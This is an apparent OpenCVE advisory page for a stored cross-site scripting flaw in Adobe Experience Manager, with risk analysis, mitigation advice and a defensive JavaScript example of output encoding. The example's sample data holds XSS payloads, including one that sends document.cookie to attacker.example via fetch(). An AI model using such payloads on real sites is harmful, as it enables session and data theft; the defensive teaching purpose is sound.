Description
Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed.
Published: 2026-06-09
Score: 5.4 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A stored cross-site scripting flaw lets a low-privileged user inject JavaScript into form fields whose contents are later rendered to other users. The submitted value is persisted and written into the page without context-appropriate output encoding, so the script runs in the origin of the AEM site for any user who views the page. Typical consequences are theft of page content and other data the script can reach, actions performed in the victim's session through requests the script issues, and defacement. The weakness is CWE-79 (Improper Neutralization of Input During Web Page Generation, i.e. cross-site scripting).

Affected Systems

Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and all earlier releases are affected. The description locates the flaw in form fields that accept input from low-privileged users; Adobe has not named the specific component.

Risk and Exploitability

The CVSS 3.1 vector is AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N (5.4, Medium): reachable over the network with low attack complexity, requires a low-privileged account, and requires a victim to open the affected page; confidentiality and integrity impact are rated low and availability is unaffected. No EPSS score is available and the CVE is not in CISA KEV, which is expected for an entry published the same day and says nothing about exploitation difficulty; stored XSS needs no special tooling once an attacker can submit to the form. The attack path is: a low-privileged user submits a crafted value into the vulnerable field, the value is stored, and the script executes in the browser of any user who later views the page. "Scope: changed" has its usual CVSS meaning for XSS: the vulnerable component is the AEM page, while the impact lands in the victim's browser under the site's origin, so the effect is not confined to the component that holds the bug.

Generated by OpenCVE AI on June 9, 2026 at 20:42 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the Adobe Experience Manager security update that addresses this CVE as soon as Adobe publishes the corresponding security bulletin; none is linked on this page yet.
  • Until then, output-encode user-supplied values for the context they are rendered into (HTML body, attribute, URL or script); input validation alone does not prevent XSS. In AEM components, audit HTL expressions that use context='unsafe' and any Java or JavaScript code that builds markup by string concatenation. A Content-Security-Policy that disallows inline script limits the impact if an encoding gap remains.
  • Restrict the affected form to the roles that need it, and review stored submissions from low-privileged accounts for HTML tags or script fragments until the fix is applied.

Generated by OpenCVE AI on June 9, 2026 at 20:42 UTC.
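The bug class described above and the encoding advice in the recommended actions, as an added example that is not OpenCVE's, Adobe's or AEM's code. It models a stored form value rendered into three HTML contexts in plain JavaScript; the field names, templates and payloads are hypothetical (the page does not identify the affected AEM component), and the tokenizer at the end is a test aid for comparing the two renderings, not a sanitizer.

```javascript
// Added example (not from OpenCVE or Adobe): a stored-XSS sink beside its
// context-aware encoding. Field names, templates and payloads are hypothetical.

// Constructed sample: values a low-privileged user could have saved into three
// fields that are later rendered into an HTML body, an attribute and a script.
const STORED = {
  name: '<img src=x onerror="alert(document.domain)">',                     // body context
  nickname: '" autofocus onfocus="alert(1)',                                // attribute context
  motto: "'; fetch('https://attacker.example/?c=' + document.cookie); '",  // script context
};

// Vulnerable rendering: stored values are concatenated straight into markup.
function renderUnsafe(v) {
  return `<p>${v.name}</p>` +
    `<input value="${v.nickname}">` +
    `<script>var motto = '${v.motto}';</script>`;
}

// Encoder for HTML body text and quoted attribute values.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Encoder for a JavaScript string literal: every non-alphanumeric character
// becomes \xNN or \uNNNN, so quotes, backslashes, newlines and "</script>"
// cannot terminate the literal or the script block. HTML encoding is the wrong
// tool in this context.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Inverse of encodeJsString, used to show the encoded value round-trips.
function decodeJsString(s) {
  return s.replace(/\\x([0-9a-f]{2})|\\u([0-9a-f]{4})/g,
    (_, x, u) => String.fromCharCode(parseInt(x ?? u, 16)));
}

// Fixed rendering: same templates, each value encoded for the context it lands in.
function renderEncoded(v) {
  return `<p>${encodeHtml(v.name)}</p>` +
    `<input value="${encodeHtml(v.nickname)}">` +
    `<script>var motto = '${encodeJsString(v.motto)}';</script>`;
}

// Minimal, quote-aware tag/attribute tokenizer so the two renderings can be
// compared roughly as a browser would parse them. Test aid, not a sanitizer.
const ENTITIES = { '&amp;': '&', '&lt;': '<', '&gt;': '>', '&quot;': '"', '&#39;': "'" };
function decodeEntities(s) {
  return s.replace(/&(amp|lt|gt|quot|#39);/g, m => ENTITIES[m]);
}

function parseTags(html) {
  const tags = [];
  const tagRe = /<(\/?[a-z][a-z0-9]*)((?:"[^"]*"|'[^']*'|[^'">])*)>/gi;
  for (const m of html.matchAll(tagRe)) {
    const attrs = {};
    const attrRe = /([^\s=\/>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;
    for (const a of m[2].matchAll(attrRe)) {
      attrs[a[1].toLowerCase()] = decodeEntities(a[2] ?? a[3] ?? a[4] ?? '');
    }
    tags.push({ name: m[1].toLowerCase(), attrs });
  }
  return tags;
}

// Names of event-handler attributes (on*) found on any tag in the markup.
function handlerAttributes(html) {
  return parseTags(html).flatMap(t => Object.keys(t.attrs).filter(k => k.startsWith('on')));
}

console.log('unsafe rendering handlers :', handlerAttributes(renderUnsafe(STORED)));
console.log('encoded rendering handlers:', handlerAttributes(renderEncoded(STORED)));
```

In the unsafe rendering the tokenizer sees an injected img element with an onerror handler, an onfocus handler broken out of the value attribute, and a motto literal that closes early and runs fetch(); in the encoded rendering only the five expected tags remain, the attribute value round-trips to the original string, and the motto stays a single string literal.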


Advisories

No advisories yet.

History

Wed, 10 Jun 2026 00:15:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Adobe
                                      Adobe adobe Experience Manager
Vendors & Products                    Adobe
                                      Adobe adobe Experience Manager

Tue, 09 Jun 2026 17:15:00 +0000

Type          Values Removed   Values Added
Description                    Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed.
Title                          Adobe Experience Manager | Cross-site Scripting (Stored XSS) (CWE-79)
Weaknesses                     CWE-79
References
Metrics                        cvssV3_1 {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}


MITRE

Status: PUBLISHED

Assigner: adobe

Published:

Updated: 2026-06-09T16:48:25.292Z

Reserved: 2026-05-21T15:28:38.135Z

Link: CVE-2026-48301

Vulnrichment

No data.

NVD

Status : Undergoing Analysis

Published: 2026-06-09T17:17:44.380

Modified: 2026-06-09T19:30:24.713

Link: CVE-2026-48301

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-10T00:00:10Z

Weaknesses